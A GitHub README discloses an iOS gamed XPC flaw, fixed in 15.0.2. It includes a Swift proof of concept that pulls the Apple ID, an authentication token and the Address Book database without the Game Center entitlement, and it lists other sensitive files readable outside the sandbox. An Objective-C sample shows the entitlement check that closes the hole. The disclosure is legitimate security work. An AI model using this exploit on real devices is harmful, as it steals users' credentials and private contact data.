illusionofchaos / ios-gamed-0day

Licence: other
iOS gamed exploit (fixed in 15.0.2)

iOS gamed exploit (fixed in 15.0.2)

Update: Apple has quietly fixed this in iOS 15.0.2 without any kind of public acknowledgement or credit.

Any app installed from the App Store may access the following data without any prompt to the user:

  • Apple ID email and the full name associated with it
  • Apple ID authentication token, which allows access to at least one of the endpoints on *.apple.com on behalf of the user
  • Complete file system read access to the Core Duet database (contains a list of contacts from Mail, SMS, iMessage and 3rd-party messaging apps, plus metadata about all of the user's interactions with these contacts (including timestamps and statistics), as well as some attachments (like URLs and texts))
  • Complete file system read access to the Speed Dial database and the Address Book database, including contact pictures and other metadata like creation and modification dates (I've just checked on iOS 15 and this one is inaccessible, so that must have been quietly fixed)

Here is a short proof of concept.

// Connect to the gamed XPC service; no Game Center entitlement is required for this to succeed.
let connection = NSXPCConnection(machServiceName: "com.apple.gamed", options: NSXPCConnection.Options.privileged)!
let proxy = connection.remoteObjectProxyWithErrorHandler({ _ in }) as! GKDaemonProtocol
connection.resume()
let pid = ProcessInfo.processInfo.processIdentifier
// gamed hands back a set of service proxies for the calling PID without checking the entitlement.
proxy.getServicesForPID(pid, localPlayer: nil, reply: { (accountService, _, _, _, _, _, _, _, utilityService, _, _, _, _) in
	// GKAccountService returns the Apple ID and a Game Center auth token when Game Center is enabled.
	accountService.authenticatePlayerWithExistingCredentials(handler: { response, error in
		let appleID = response.credential.accountName
		let token = response.credential.authenticationToken
	})

	// GKUtilityService reads any file URL, i.e. outside the app sandbox, and returns its contents.
	utilityService.requestImageData(for: URL(fileURLWithPath: "/var/mobile/Library/AddressBook/AddressBook.sqlitedb"), subdirectory: nil, fileName: nil, handler: { data in
		let addressBookData = data
	})
})

How it happens:

  • The XPC service com.apple.gamed doesn't properly check for the com.apple.developer.game-center entitlement.
  • Even if Game Center is disabled on the device, invoking getServicesForPID:localPlayer:reply: returns several XPC proxy objects (GKAccountService, GKFriendService, GKUtilityService, etc.).
  • If Game Center is enabled on the device (even if it's not enabled for the app in App Store Connect and the app doesn't contain the com.apple.developer.game-center entitlement), invoking authenticatePlayerWithExistingCredentialsWithHandler: on GKAccountService returns an object containing the user's Apple ID, DSID and Game Center authentication token (which allows sending requests to https://gc.apple.com on behalf of the user). Invoking getProfilesForPlayerIDs:handler: on GKProfileService returns an object containing the first and last name of the user's Apple ID. Invoking getFriendsForPlayer:handler: on GKFriendService returns an object with information about the user's friends in Game Center.
  • Even if Game Center is disabled, it's not enabled for the app in App Store Connect and the app doesn't contain the com.apple.developer.game-center entitlement, invoking requestImageDataForURL:subdirectory:fileName:handler: on GKUtilityService allows reading arbitrary files outside of the app sandbox by passing file URLs to that method. Among the files that can be accessed that way are the following (not an exhaustive list):
      - /var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist - contains the mobile gestalt cache
      - /var/mobile/Library/CoreDuet/People/interactionC.db - contains a list of contacts from Mail, SMS, iMessage and 3rd-party messaging apps, plus metadata about the user's interactions with these contacts (including timestamps and statistics)
      - /var/mobile/Library/Preferences/com.apple.mobilephone.speeddial.plist - contains favorite contacts and their phone numbers
      - /var/mobile/Library/AddressBook/AddressBook.sqlitedb - contains the complete Address Book database
      - /var/mobile/Library/AddressBook/AddressBookImages.sqlitedb - contains photos of Address Book contacts
  • Invoking cacheImageData:inSubdirectory:withFileName:handler: on GKUtilityService might allow writing arbitrary data to a location outside of the app sandbox.
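The first item above is the root cause: the service hands out proxies to any caller without verifying that the caller's code signature carries the entitlement. The following is an added illustration, not code from this repository or from Apple, of what such a check looks like for an NSXPCListener-based service. It uses the public macOS 13+ API -[NSXPCConnection setCodeSigningRequirement:], which makes the XPC runtime refuse to deliver messages from (and invalidate the connection of) any peer whose signature does not satisfy the requirement. The service name com.example.placeholder-service, the protocol ExampleServiceProtocol and the reply data are placeholders; gamed's real implementation on iOS is not public, and the equivalent check there uses Apple-internal interfaces.

```objc
// Added illustration: entitlement gating for an NSXPCListener service.
// Assumes macOS 13 or later for -setCodeSigningRequirement:. Everything
// named "Example"/"placeholder" below is hypothetical.
#import <Foundation/Foundation.h>

// Hypothetical protocol, standing in for a daemon protocol like GKDaemonProtocol.
@protocol ExampleServiceProtocol
- (void)fetchSensitiveDataWithReply:(void (^)(NSData *data))reply;
@end

@interface ExampleService : NSObject <ExampleServiceProtocol>
@end

@implementation ExampleService
- (void)fetchSensitiveDataWithReply:(void (^)(NSData *data))reply {
    // Constructed sample payload; a real service would return protected data here.
    reply([@"constructed-sensitive-record" dataUsingEncoding:NSUTF8StringEncoding]);
}
@end

@interface GatedListenerDelegate : NSObject <NSXPCListenerDelegate>
@end

@implementation GatedListenerDelegate
- (BOOL)listener:(NSXPCListener *)listener
    shouldAcceptNewConnection:(NSXPCConnection *)newConnection {
    // The requirement is evaluated against the peer's code signature by the
    // system, not against a PID supplied by the client, so it cannot be
    // satisfied by an app that merely claims to be entitled. Messages from a
    // peer that fails it are never dispatched to the exported object.
    NSString *requirement =
        @"anchor apple generic and "
        @"entitlement[\"com.apple.developer.game-center\"] exists";
    [newConnection setCodeSigningRequirement:requirement];

    newConnection.exportedInterface =
        [NSXPCInterface interfaceWithProtocol:@protocol(ExampleServiceProtocol)];
    newConnection.exportedObject = [ExampleService new];
    [newConnection resume];
    return YES;
}
@end

int main(void) {
    @autoreleasepool {
        // Placeholder Mach service name; a launchd plist would register it.
        NSXPCListener *listener =
            [[NSXPCListener alloc] initWithMachServiceName:@"com.example.placeholder-service"];
        GatedListenerDelegate *delegate = [GatedListenerDelegate new];
        listener.delegate = delegate;
        [listener resume];
        [[NSRunLoop currentRunLoop] run];
    }
    return 0;
}
```

The point of attaching the requirement before exporting any object is that the decision is made once, at connection time, rather than being left to each individual method such as the per-service calls listed above; a design where every proxy method must remember to check is exactly the design that fails open.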

On the Apple Security Bounty Program page this vulnerability is evaluated at $100,000 (Broad app access to sensitive data normally protected by a TCC prompt or the platform sandbox. "Sensitive data" access includes gaining broad access (i.e., the full database) from Contacts).
